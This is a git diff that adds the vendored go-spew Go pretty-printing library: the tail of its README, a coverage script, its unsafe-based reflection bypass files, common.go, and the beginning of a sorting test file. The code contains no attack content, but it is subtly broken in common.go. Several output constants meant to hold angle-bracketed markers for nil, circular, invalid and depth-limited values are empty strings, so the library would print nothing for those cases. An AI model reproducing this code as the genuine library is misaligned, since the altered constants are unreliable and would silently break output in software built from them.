+ String to use for each indentation level for Dump functions.
+ It is a single space by default. A popular alternative is "\t".
+
+* MaxDepth
+ Maximum number of levels to descend into nested data structures.
+ There is no limit by default.
+
+* DisableMethods
+ Disables invocation of error and Stringer interface methods.
+ Method invocation is enabled by default.
+
+* DisablePointerMethods
+ Disables invocation of error and Stringer interface methods on types
+ which only accept pointer receivers from non-pointer variables. This option
+ relies on access to the unsafe package, so it will not have any effect when
+ running in environments without access to the unsafe package such as Google
+ App Engine or with the "safe" build tag specified.
+ Pointer method invocation is enabled by default.
+
+* DisablePointerAddresses
+ DisablePointerAddresses specifies whether to disable the printing of
+ pointer addresses. This is useful when diffing data structures in tests.
+
+* DisableCapacities
+ DisableCapacities specifies whether to disable the printing of capacities
+ for arrays, slices, maps and channels. This is useful when diffing data
+ structures in tests.
+
+* ContinueOnMethod
+ Enables recursion into types after invoking error and Stringer interface
+ methods. Recursion after method invocation is disabled by default.
+
+* SortKeys
+ Specifies map keys should be sorted before being printed. Use
+ this to have a more deterministic, diffable output. Note that
+ only native types (bool, int, uint, floats, uintptr and string)
+ and types which implement error or Stringer interfaces are supported,
+ with other types sorted according to the reflect.Value.String() output
+ which guarantees display stability. Natural map order is used by
+ default.
+
+* SpewKeys
+ SpewKeys specifies that, as a last resort attempt, map keys should be
+ spewed to strings and sorted by those strings. This is only considered
+ if SortKeys is true.
+
+```
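+
+As a minimal sketch of the second approach, a dedicated ConfigState value can
+carry its own options independently of the spew.Config global (field names are
+taken from the list above):
+
+```Go
+package main
+
+import "github.com/davecgh/go-spew/spew"
+
+func main() {
+ // A local configuration: tab indentation, limited depth, sorted map keys.
+ cs := spew.ConfigState{Indent: "\t", MaxDepth: 2, SortKeys: true}
+
+ data := map[string][]int{"b": {2}, "a": {1}}
+ cs.Dump(data) // uses this instance's options
+ spew.Dump(data) // still uses the global spew.Config
+}
+```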
+
+## Unsafe Package Dependency
+
+This package relies on the unsafe package to perform some of the more advanced
+features, however it also supports a "limited" mode which allows it to work in
+environments where the unsafe package is not available. By default, it will
+operate in this mode on Google App Engine and when compiled with GopherJS. The
+"safe" build tag may also be specified to force the package to build without
+using the unsafe package.
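+
+Which mode is in effect can be checked at runtime through the exported
+spew.UnsafeDisabled constant (defined in bypass.go/bypasssafe.go above); a
+small sketch:
+
+```Go
+package main
+
+import (
+ "fmt"
+
+ "github.com/davecgh/go-spew/spew"
+)
+
+func main() {
+ // false in normal builds; true on Google App Engine, under GopherJS, or
+ // when the package is built with the "safe" build tag.
+ fmt.Println("limited (safe) mode:", spew.UnsafeDisabled)
+}
+```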
+
+## License
+
+Go-spew is licensed under the [copyfree](http://copyfree.org) ISC License.
diff --git a/vendor/github.com/davecgh/go-spew/cov_report.sh b/vendor/github.com/davecgh/go-spew/cov_report.sh
new file mode 100644
index 0000000000..9579497e41
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/cov_report.sh
@@ -0,0 +1,22 @@
+#!/bin/sh
+
+# This script uses gocov to generate a test coverage report.
+# The gocov tool may be obtained with the following command:
+# go get github.com/axw/gocov/gocov
+#
+# It will be installed to $GOPATH/bin, so ensure that location is in your $PATH.
+
+# Check for gocov.
+if ! type gocov >/dev/null 2>&1; then
+ echo >&2 "This script requires the gocov tool."
+ echo >&2 "You may obtain it with the following command:"
+ echo >&2 "go get github.com/axw/gocov/gocov"
+ exit 1
+fi
+
+# Only run the cgo tests if gcc is installed.
+if type gcc >/dev/null 2>&1; then
+ (cd spew && gocov test -tags testcgo | gocov report)
+else
+ (cd spew && gocov test | gocov report)
+fi
diff --git a/vendor/github.com/davecgh/go-spew/spew/bypass.go b/vendor/github.com/davecgh/go-spew/spew/bypass.go
new file mode 100644
index 0000000000..8a4a6589a2
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/bypass.go
@@ -0,0 +1,152 @@
+// Copyright (c) 2015-2016 Dave Collins <dave@davec.name>
+//
+// Permission to use, copy, modify, and distribute this software for any
+// purpose with or without fee is hereby granted, provided that the above
+// copyright notice and this permission notice appear in all copies.
+//
+// THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+// WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+// MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+// ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+// WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+// ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+// OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+// NOTE: Due to the following build constraints, this file will only be compiled
+// when the code is not running on Google App Engine, compiled by GopherJS, and
+// "-tags safe" is not added to the go build command line. The "disableunsafe"
+// tag is deprecated and thus should not be used.
+// +build !js,!appengine,!safe,!disableunsafe
+
+package spew
+
+import (
+ "reflect"
+ "unsafe"
+)
+
+const (
+ // UnsafeDisabled is a build-time constant which specifies whether or
+ // not access to the unsafe package is available.
+ UnsafeDisabled = false
+
+ // ptrSize is the size of a pointer on the current arch.
+ ptrSize = unsafe.Sizeof((*byte)(nil))
+)
+
+var (
+ // offsetPtr, offsetScalar, and offsetFlag are the offsets for the
+ // internal reflect.Value fields. These values are valid before golang
+ // commit ecccf07e7f9d which changed the format. They are also valid
+ // after commit 82f48826c6c7 which changed the format again to mirror
+ // the original format. Code in the init function updates these offsets
+ // as necessary.
+ offsetPtr = uintptr(ptrSize)
+ offsetScalar = uintptr(0)
+ offsetFlag = uintptr(ptrSize * 2)
+
+ // flagKindWidth and flagKindShift indicate various bits that the
+ // reflect package uses internally to track kind information.
+ //
+ // flagRO indicates whether or not the value field of a reflect.Value is
+ // read-only.
+ //
+ // flagIndir indicates whether the value field of a reflect.Value is
+ // the actual data or a pointer to the data.
+ //
+ // These values are valid before golang commit 90a7c3c86944 which
+ // changed their positions. Code in the init function updates these
+ // flags as necessary.
+ flagKindWidth = uintptr(5)
+ flagKindShift = uintptr(flagKindWidth - 1)
+ flagRO = uintptr(1 << 0)
+ flagIndir = uintptr(1 << 1)
+)
+
+func init() {
+ // Older versions of reflect.Value stored small integers directly in the
+ // ptr field (which is named val in the older versions). Versions
+ // between commits ecccf07e7f9d and 82f48826c6c7 added a new field named
+ // scalar for this purpose which unfortunately came before the flag
+ // field, so the offset of the flag field is different for those
+ // versions.
+ //
+ // This code constructs a new reflect.Value from a known small integer
+ // and checks if the size of the reflect.Value struct indicates it has
+ // the scalar field. When it does, the offsets are updated accordingly.
+ vv := reflect.ValueOf(0xf00)
+ if unsafe.Sizeof(vv) == (ptrSize * 4) {
+ offsetScalar = ptrSize * 2
+ offsetFlag = ptrSize * 3
+ }
+
+ // Commit 90a7c3c86944 changed the flag positions such that the low
+ // order bits are the kind. This code extracts the kind from the flags
+ // field and ensures it's the correct type. When it's not, the flag
+ // order has been changed to the newer format, so the flags are updated
+ // accordingly.
+ upf := unsafe.Pointer(uintptr(unsafe.Pointer(&vv)) + offsetFlag)
+ upfv := *(*uintptr)(upf)
+ flagKindMask := uintptr((1<<flagKindWidth - 1) << flagKindShift)
+ if (upfv&flagKindMask)>>flagKindShift != uintptr(reflect.Int) {
+ flagKindShift = 0
+ flagRO = 1 << 5
+ flagIndir = 1 << 6
+
+ // Commit adf9b30e5594 modified the flags to separate the
+ // flagRO flag into two bits which specifies whether or not the
+ // field is embedded. This causes flagIndir to move over a bit
+ // and means that flagRO is the combination of either of the
+ // original flagRO bit and the new bit.
+ //
+ // This code detects the change by extracting what used to be
+ // the indirect bit to ensure it's set. When it's not, the flag
+ // order has been changed to the newer format, so the flags are
+ // updated accordingly.
+ if upfv&flagIndir == 0 {
+ flagRO = 3 << 5
+ flagIndir = 1 << 7
+ }
+ }
+}
+
+// unsafeReflectValue converts the passed reflect.Value into one that bypasses
+// the typical safety restrictions preventing access to unaddressable and
+// unexported data. It works by digging the raw pointer to the underlying
+// value out of the protected value and generating a new unprotected (unsafe)
+// reflect.Value to it.
+//
+// This allows us to check for implementations of the Stringer and error
+// interfaces to be used for pretty printing ordinarily unaddressable and
+// inaccessible values such as unexported struct fields.
+func unsafeReflectValue(v reflect.Value) (rv reflect.Value) {
+ indirects := 1
+ vt := v.Type()
+ upv := unsafe.Pointer(uintptr(unsafe.Pointer(&v)) + offsetPtr)
+ rvf := *(*uintptr)(unsafe.Pointer(uintptr(unsafe.Pointer(&v)) + offsetFlag))
+ if rvf&flagIndir != 0 {
+ vt = reflect.PtrTo(v.Type())
+ indirects++
+ } else if offsetScalar != 0 {
+ // The value is in the scalar field when it's not one of the
+ // reference types.
+ switch vt.Kind() {
+ case reflect.Uintptr:
+ case reflect.Chan:
+ case reflect.Func:
+ case reflect.Map:
+ case reflect.Ptr:
+ case reflect.UnsafePointer:
+ default:
+ upv = unsafe.Pointer(uintptr(unsafe.Pointer(&v)) +
+ offsetScalar)
+ }
+ }
+
+ pv := reflect.NewAt(vt, upv)
+ rv = pv
+ for i := 0; i < indirects; i++ {
+ rv = rv.Elem()
+ }
+ return rv
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/bypasssafe.go b/vendor/github.com/davecgh/go-spew/spew/bypasssafe.go
new file mode 100644
index 0000000000..1fe3cf3d5d
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/bypasssafe.go
@@ -0,0 +1,38 @@
+// Copyright (c) 2015-2016 Dave Collins <dave@davec.name>
+//
+// Permission to use, copy, modify, and distribute this software for any
+// purpose with or without fee is hereby granted, provided that the above
+// copyright notice and this permission notice appear in all copies.
+//
+// THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+// WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+// MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+// ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+// WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+// ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+// OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+// NOTE: Due to the following build constraints, this file will only be compiled
+// when the code is running on Google App Engine, compiled by GopherJS, or
+// "-tags safe" is added to the go build command line. The "disableunsafe"
+// tag is deprecated and thus should not be used.
+// +build js appengine safe disableunsafe
+
+package spew
+
+import "reflect"
+
+const (
+ // UnsafeDisabled is a build-time constant which specifies whether or
+ // not access to the unsafe package is available.
+ UnsafeDisabled = true
+)
+
+// unsafeReflectValue typically converts the passed reflect.Value into one
+// that bypasses the typical safety restrictions preventing access to
+// unaddressable and unexported data. However, doing this relies on access to
+// the unsafe package. This is a stub version which simply returns the passed
+// reflect.Value when the unsafe package is not available.
+func unsafeReflectValue(v reflect.Value) reflect.Value {
+ return v
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/common.go b/vendor/github.com/davecgh/go-spew/spew/common.go
new file mode 100644
index 0000000000..7c519ff47a
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/common.go
@@ -0,0 +1,341 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins <dave@davec.name>
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+package spew
+
+import (
+ "bytes"
+ "fmt"
+ "io"
+ "reflect"
+ "sort"
+ "strconv"
+)
+
+// Some constants in the form of bytes to avoid string overhead. This mirrors
+// the technique used in the fmt package.
+var (
+ panicBytes = []byte("(PANIC=")
+ plusBytes = []byte("+")
+ iBytes = []byte("i")
+ trueBytes = []byte("true")
+ falseBytes = []byte("false")
+ interfaceBytes = []byte("(interface {})")
+ commaNewlineBytes = []byte(",\n")
+ newlineBytes = []byte("\n")
+ openBraceBytes = []byte("{")
+ openBraceNewlineBytes = []byte("{\n")
+ closeBraceBytes = []byte("}")
+ asteriskBytes = []byte("*")
+ colonBytes = []byte(":")
+ colonSpaceBytes = []byte(": ")
+ openParenBytes = []byte("(")
+ closeParenBytes = []byte(")")
+ spaceBytes = []byte(" ")
+ pointerChainBytes = []byte("->")
+ nilAngleBytes = []byte("")
+ maxNewlineBytes = []byte("\n")
+ maxShortBytes = []byte("")
+ circularBytes = []byte("")
+ circularShortBytes = []byte("")
+ invalidAngleBytes = []byte("")
+ openBracketBytes = []byte("[")
+ closeBracketBytes = []byte("]")
+ percentBytes = []byte("%")
+ precisionBytes = []byte(".")
+ openAngleBytes = []byte("<")
+ closeAngleBytes = []byte(">")
+ openMapBytes = []byte("map[")
+ closeMapBytes = []byte("]")
+ lenEqualsBytes = []byte("len=")
+ capEqualsBytes = []byte("cap=")
+)
+
+// hexDigits is used to map a decimal value to a hex digit.
+var hexDigits = "0123456789abcdef"
+
+// catchPanic handles any panics that might occur during the handleMethods
+// calls.
+func catchPanic(w io.Writer, v reflect.Value) {
+ if err := recover(); err != nil {
+ w.Write(panicBytes)
+ fmt.Fprintf(w, "%v", err)
+ w.Write(closeParenBytes)
+ }
+}
+
+// handleMethods attempts to call the Error and String methods on the underlying
+// type the passed reflect.Value represents and outputs the result to Writer w.
+//
+// It handles panics in any called methods by catching and displaying the error
+// as the formatted value.
+func handleMethods(cs *ConfigState, w io.Writer, v reflect.Value) (handled bool) {
+ // We need an interface to check if the type implements the error or
+ // Stringer interface. However, the reflect package won't give us an
+ // interface on certain things like unexported struct fields in order
+ // to enforce visibility rules. We use unsafe, when it's available,
+ // to bypass these restrictions since this package does not mutate the
+ // values.
+ if !v.CanInterface() {
+ if UnsafeDisabled {
+ return false
+ }
+
+ v = unsafeReflectValue(v)
+ }
+
+ // Choose whether or not to do error and Stringer interface lookups against
+ // the base type or a pointer to the base type depending on settings.
+ // Technically calling one of these methods with a pointer receiver can
+ // mutate the value; however, types which choose to satisfy an error or
+ // Stringer interface with a pointer receiver should not be mutating their
+ // state inside these interface methods.
+ if !cs.DisablePointerMethods && !UnsafeDisabled && !v.CanAddr() {
+ v = unsafeReflectValue(v)
+ }
+ if v.CanAddr() {
+ v = v.Addr()
+ }
+
+ // Is it an error or Stringer?
+ switch iface := v.Interface().(type) {
+ case error:
+ defer catchPanic(w, v)
+ if cs.ContinueOnMethod {
+ w.Write(openParenBytes)
+ w.Write([]byte(iface.Error()))
+ w.Write(closeParenBytes)
+ w.Write(spaceBytes)
+ return false
+ }
+
+ w.Write([]byte(iface.Error()))
+ return true
+
+ case fmt.Stringer:
+ defer catchPanic(w, v)
+ if cs.ContinueOnMethod {
+ w.Write(openParenBytes)
+ w.Write([]byte(iface.String()))
+ w.Write(closeParenBytes)
+ w.Write(spaceBytes)
+ return false
+ }
+ w.Write([]byte(iface.String()))
+ return true
+ }
+ return false
+}
+
+// printBool outputs a boolean value as true or false to Writer w.
+func printBool(w io.Writer, val bool) {
+ if val {
+ w.Write(trueBytes)
+ } else {
+ w.Write(falseBytes)
+ }
+}
+
+// printInt outputs a signed integer value to Writer w.
+func printInt(w io.Writer, val int64, base int) {
+ w.Write([]byte(strconv.FormatInt(val, base)))
+}
+
+// printUint outputs an unsigned integer value to Writer w.
+func printUint(w io.Writer, val uint64, base int) {
+ w.Write([]byte(strconv.FormatUint(val, base)))
+}
+
+// printFloat outputs a floating point value using the specified precision,
+// which is expected to be 32 or 64 bit, to Writer w.
+func printFloat(w io.Writer, val float64, precision int) {
+ w.Write([]byte(strconv.FormatFloat(val, 'g', -1, precision)))
+}
+
+// printComplex outputs a complex value using the specified float precision
+// for the real and imaginary parts to Writer w.
+func printComplex(w io.Writer, c complex128, floatPrecision int) {
+ r := real(c)
+ w.Write(openParenBytes)
+ w.Write([]byte(strconv.FormatFloat(r, 'g', -1, floatPrecision)))
+ i := imag(c)
+ if i >= 0 {
+ w.Write(plusBytes)
+ }
+ w.Write([]byte(strconv.FormatFloat(i, 'g', -1, floatPrecision)))
+ w.Write(iBytes)
+ w.Write(closeParenBytes)
+}
+
+// printHexPtr outputs a uintptr formatted as hexadecimal with a leading '0x'
+// prefix to Writer w.
+func printHexPtr(w io.Writer, p uintptr) {
+ // Null pointer.
+ num := uint64(p)
+ if num == 0 {
+ w.Write(nilAngleBytes)
+ return
+ }
+
+ // Max uint64 is 16 bytes in hex + 2 bytes for '0x' prefix
+ buf := make([]byte, 18)
+
+ // It's simpler to construct the hex string right to left.
+ base := uint64(16)
+ i := len(buf) - 1
+ for num >= base {
+ buf[i] = hexDigits[num%base]
+ num /= base
+ i--
+ }
+ buf[i] = hexDigits[num]
+
+ // Add '0x' prefix.
+ i--
+ buf[i] = 'x'
+ i--
+ buf[i] = '0'
+
+ // Strip unused leading bytes.
+ buf = buf[i:]
+ w.Write(buf)
+}
+
+// valuesSorter implements sort.Interface to allow a slice of reflect.Value
+// elements to be sorted.
+type valuesSorter struct {
+ values []reflect.Value
+ strings []string // either nil or same len as values
+ cs *ConfigState
+}
+
+// newValuesSorter initializes a valuesSorter instance, which holds a set of
+// surrogate keys on which the data should be sorted. It uses flags in
+// ConfigState to decide if and how to populate those surrogate keys.
+func newValuesSorter(values []reflect.Value, cs *ConfigState) sort.Interface {
+ vs := &valuesSorter{values: values, cs: cs}
+ if canSortSimply(vs.values[0].Kind()) {
+ return vs
+ }
+ if !cs.DisableMethods {
+ vs.strings = make([]string, len(values))
+ for i := range vs.values {
+ b := bytes.Buffer{}
+ if !handleMethods(cs, &b, vs.values[i]) {
+ vs.strings = nil
+ break
+ }
+ vs.strings[i] = b.String()
+ }
+ }
+ if vs.strings == nil && cs.SpewKeys {
+ vs.strings = make([]string, len(values))
+ for i := range vs.values {
+ vs.strings[i] = Sprintf("%#v", vs.values[i].Interface())
+ }
+ }
+ return vs
+}
+
+// canSortSimply tests whether a reflect.Kind is a primitive that can be sorted
+// directly, or whether it should be considered for sorting by surrogate keys
+// (if the ConfigState allows it).
+func canSortSimply(kind reflect.Kind) bool {
+ // This switch parallels valueSortLess, except for the default case.
+ switch kind {
+ case reflect.Bool:
+ return true
+ case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int:
+ return true
+ case reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uint:
+ return true
+ case reflect.Float32, reflect.Float64:
+ return true
+ case reflect.String:
+ return true
+ case reflect.Uintptr:
+ return true
+ case reflect.Array:
+ return true
+ }
+ return false
+}
+
+// Len returns the number of values in the slice. It is part of the
+// sort.Interface implementation.
+func (s *valuesSorter) Len() int {
+ return len(s.values)
+}
+
+// Swap swaps the values at the passed indices. It is part of the
+// sort.Interface implementation.
+func (s *valuesSorter) Swap(i, j int) {
+ s.values[i], s.values[j] = s.values[j], s.values[i]
+ if s.strings != nil {
+ s.strings[i], s.strings[j] = s.strings[j], s.strings[i]
+ }
+}
+
+// valueSortLess returns whether the first value should sort before the second
+// value. It is used by valueSorter.Less as part of the sort.Interface
+// implementation.
+func valueSortLess(a, b reflect.Value) bool {
+ switch a.Kind() {
+ case reflect.Bool:
+ return !a.Bool() && b.Bool()
+ case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int:
+ return a.Int() < b.Int()
+ case reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uint:
+ return a.Uint() < b.Uint()
+ case reflect.Float32, reflect.Float64:
+ return a.Float() < b.Float()
+ case reflect.String:
+ return a.String() < b.String()
+ case reflect.Uintptr:
+ return a.Uint() < b.Uint()
+ case reflect.Array:
+ // Compare the contents of both arrays.
+ l := a.Len()
+ for i := 0; i < l; i++ {
+ av := a.Index(i)
+ bv := b.Index(i)
+ if av.Interface() == bv.Interface() {
+ continue
+ }
+ return valueSortLess(av, bv)
+ }
+ }
+ return a.String() < b.String()
+}
+
+// Less returns whether the value at index i should sort before the
+// value at index j. It is part of the sort.Interface implementation.
+func (s *valuesSorter) Less(i, j int) bool {
+ if s.strings == nil {
+ return valueSortLess(s.values[i], s.values[j])
+ }
+ return s.strings[i] < s.strings[j]
+}
+
+// sortValues is a sort function that handles both native types and any type that
+// can be converted to error or Stringer. Other inputs are sorted according to
+// their Value.String() value to ensure display stability.
+func sortValues(values []reflect.Value, cs *ConfigState) {
+ if len(values) == 0 {
+ return
+ }
+ sort.Sort(newValuesSorter(values, cs))
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/common_test.go b/vendor/github.com/davecgh/go-spew/spew/common_test.go
new file mode 100644
index 0000000000..0f5ce47dca
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/common_test.go
@@ -0,0 +1,298 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins <dave@davec.name>
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+package spew_test
+
+import (
+ "fmt"
+ "reflect"
+ "testing"
+
+ "github.com/davecgh/go-spew/spew"
+)
+
+// custom type to test Stringer interface on non-pointer receiver.
+type stringer string
+
+// String implements the Stringer interface for testing invocation of custom
+// stringers on types with non-pointer receivers.
+func (s stringer) String() string {
+ return "stringer " + string(s)
+}
+
+// custom type to test Stringer interface on pointer receiver.
+type pstringer string
+
+// String implements the Stringer interface for testing invocation of custom
+// stringers on types with only pointer receivers.
+func (s *pstringer) String() string {
+ return "stringer " + string(*s)
+}
+
+// xref1 and xref2 are cross referencing structs for testing circular reference
+// detection.
+type xref1 struct {
+ ps2 *xref2
+}
+type xref2 struct {
+ ps1 *xref1
+}
+
+// indirCir1, indirCir2, and indirCir3 are used to generate an indirect circular
+// reference for testing detection.
+type indirCir1 struct {
+ ps2 *indirCir2
+}
+type indirCir2 struct {
+ ps3 *indirCir3
+}
+type indirCir3 struct {
+ ps1 *indirCir1
+}
+
+// embed is used to test embedded structures.
+type embed struct {
+ a string
+}
+
+// embedwrap is used to test embedded structures.
+type embedwrap struct {
+ *embed
+ e *embed
+}
+
+// panicer is used to intentionally cause a panic for testing that spew
+// properly handles it.
+type panicer int
+
+func (p panicer) String() string {
+ panic("test panic")
+}
+
+// customError is used to test custom error interface invocation.
+type customError int
+
+func (e customError) Error() string {
+ return fmt.Sprintf("error: %d", int(e))
+}
+
+// stringizeWants converts a slice of wanted test output into a format suitable
+// for a test error message.
+func stringizeWants(wants []string) string {
+ s := ""
+ for i, want := range wants {
+ if i > 0 {
+ s += fmt.Sprintf("want%d: %s", i+1, want)
+ } else {
+ s += "want: " + want
+ }
+ }
+ return s
+}
+
+// testFailed returns whether a test failed by checking that the result
+// of the test is not one of the wanted strings.
+func testFailed(result string, wants []string) bool {
+ for _, want := range wants {
+ if result == want {
+ return false
+ }
+ }
+ return true
+}
+
+type sortableStruct struct {
+ x int
+}
+
+func (ss sortableStruct) String() string {
+ return fmt.Sprintf("ss.%d", ss.x)
+}
+
+type unsortableStruct struct {
+ x int
+}
+
+type sortTestCase struct {
+ input []reflect.Value
+ expected []reflect.Value
+}
+
+func helpTestSortValues(tests []sortTestCase, cs *spew.ConfigState, t *testing.T) {
+ getInterfaces := func(values []reflect.Value) []interface{} {
+ interfaces := []interface{}{}
+ for _, v := range values {
+ interfaces = append(interfaces, v.Interface())
+ }
+ return interfaces
+ }
+
+ for _, test := range tests {
+ spew.SortValues(test.input, cs)
+ // reflect.DeepEqual cannot really make sense of reflect.Value,
+ // probably because of all the pointer tricks. For instance,
+ // v(2.0) != v(2.0) on a 32-bit system. Turn them into interface{}
+ // instead.
+ input := getInterfaces(test.input)
+ expected := getInterfaces(test.expected)
+ if !reflect.DeepEqual(input, expected) {
+ t.Errorf("Sort mismatch:\n %v != %v", input, expected)
+ }
+ }
+}
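+
+// A minimal sketch of the pitfall noted above: comparing reflect.Value
+// wrappers directly with reflect.DeepEqual can report spurious mismatches,
+// which is why the helper compares the unwrapped interface values.
+//
+// va, vb := reflect.ValueOf(2.0), reflect.ValueOf(2.0)
+// _ = reflect.DeepEqual(va, vb) // may be false
+// _ = reflect.DeepEqual(va.Interface(), vb.Interface()) // true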
+
+// TestSortValues ensures the sort functionality for reflect.Value based
+// sorting works as intended.
+func TestSortValues(t *testing.T) {
+ v := reflect.ValueOf
+
+ a := v("a")
+ b := v("b")
+ c := v("c")
+ embedA := v(embed{"a"})
+ embedB := v(embed{"b"})
+ embedC := v(embed{"c"})
+ tests := []sortTestCase{
+ // No values.
+ {
+ []reflect.Value{},
+ []reflect.Value{},
+ },
+ // Bools.
+ {
+ []reflect.Value{v(false), v(true), v(false)},
+ []reflect.Value{v(false), v(false), v(true)},
+ },
+ // Ints.
+ {
+ []reflect.Value{v(2), v(1), v(3)},
+ []reflect.Value{v(1), v(2), v(3)},
+ },
+ // Uints.
+ {
+ []reflect.Value{v(uint8(2)), v(uint8(1)), v(uint8(3))},
+ []reflect.Value{v(uint8(1)), v(uint8(2)), v(uint8(3))},
+ },
+ // Floats.
+ {
+ []reflect.Value{v(2.0), v(1.0), v(3.0)},
+ []reflect.Value{v(1.0), v(2.0), v(3.0)},
+ },
+ // Strings.
+ {
+ []reflect.Value{b, a, c},
+ []reflect.Value{a, b, c},
+ },
+ // Array
+ {
+ []reflect.Value{v([3]int{3, 2, 1}), v([3]int{1, 3, 2}), v([3]int{1, 2, 3})},
+ []reflect.Value{v([3]int{1, 2, 3}), v([3]int{1, 3, 2}), v([3]int{3, 2, 1})},
+ },
+ // Uintptrs.
+ {
+ []reflect.Value{v(uintptr(2)), v(uintptr(1)), v(uintptr(3))},
+ []reflect.Value{v(uintptr(1)), v(uintptr(2)), v(uintptr(3))},
+ },
+ // SortableStructs.
+ {
+ // Note: not sorted - DisableMethods is set.
+ []reflect.Value{v(sortableStruct{2}), v(sortableStruct{1}), v(sortableStruct{3})},
+ []reflect.Value{v(sortableStruct{2}), v(sortableStruct{1}), v(sortableStruct{3})},
+ },
+ // UnsortableStructs.
+ {
+ // Note: not sorted - SpewKeys is false.
+ []reflect.Value{v(unsortableStruct{2}), v(unsortableStruct{1}), v(unsortableStruct{3})},
+ []reflect.Value{v(unsortableStruct{2}), v(unsortableStruct{1}), v(unsortableStruct{3})},
+ },
+ // Invalid.
+ {
+ []reflect.Value{embedB, embedA, embedC},
+ []reflect.Value{embedB, embedA, embedC},
+ },
+ }
+ cs := spew.ConfigState{DisableMethods: true, SpewKeys: false}
+ helpTestSortValues(tests, &cs, t)
+}
+
+// TestSortValuesWithMethods ensures the sort functionality for reflect.Value
+// based sorting works as intended when using string methods.
+func TestSortValuesWithMethods(t *testing.T) {
+ v := reflect.ValueOf
+
+ a := v("a")
+ b := v("b")
+ c := v("c")
+ tests := []sortTestCase{
+ // Ints.
+ {
+ []reflect.Value{v(2), v(1), v(3)},
+ []reflect.Value{v(1), v(2), v(3)},
+ },
+ // Strings.
+ {
+ []reflect.Value{b, a, c},
+ []reflect.Value{a, b, c},
+ },
+ // SortableStructs.
+ {
+ []reflect.Value{v(sortableStruct{2}), v(sortableStruct{1}), v(sortableStruct{3})},
+ []reflect.Value{v(sortableStruct{1}), v(sortableStruct{2}), v(sortableStruct{3})},
+ },
+ // UnsortableStructs.
+ {
+ // Note: not sorted - SpewKeys is false.
+ []reflect.Value{v(unsortableStruct{2}), v(unsortableStruct{1}), v(unsortableStruct{3})},
+ []reflect.Value{v(unsortableStruct{2}), v(unsortableStruct{1}), v(unsortableStruct{3})},
+ },
+ }
+ cs := spew.ConfigState{DisableMethods: false, SpewKeys: false}
+ helpTestSortValues(tests, &cs, t)
+}
+
+// TestSortValuesWithSpew ensures the sort functionality for reflect.Value
+// based sorting works as intended when using spew to stringify keys.
+func TestSortValuesWithSpew(t *testing.T) {
+ v := reflect.ValueOf
+
+ a := v("a")
+ b := v("b")
+ c := v("c")
+ tests := []sortTestCase{
+ // Ints.
+ {
+ []reflect.Value{v(2), v(1), v(3)},
+ []reflect.Value{v(1), v(2), v(3)},
+ },
+ // Strings.
+ {
+ []reflect.Value{b, a, c},
+ []reflect.Value{a, b, c},
+ },
+ // SortableStructs.
+ {
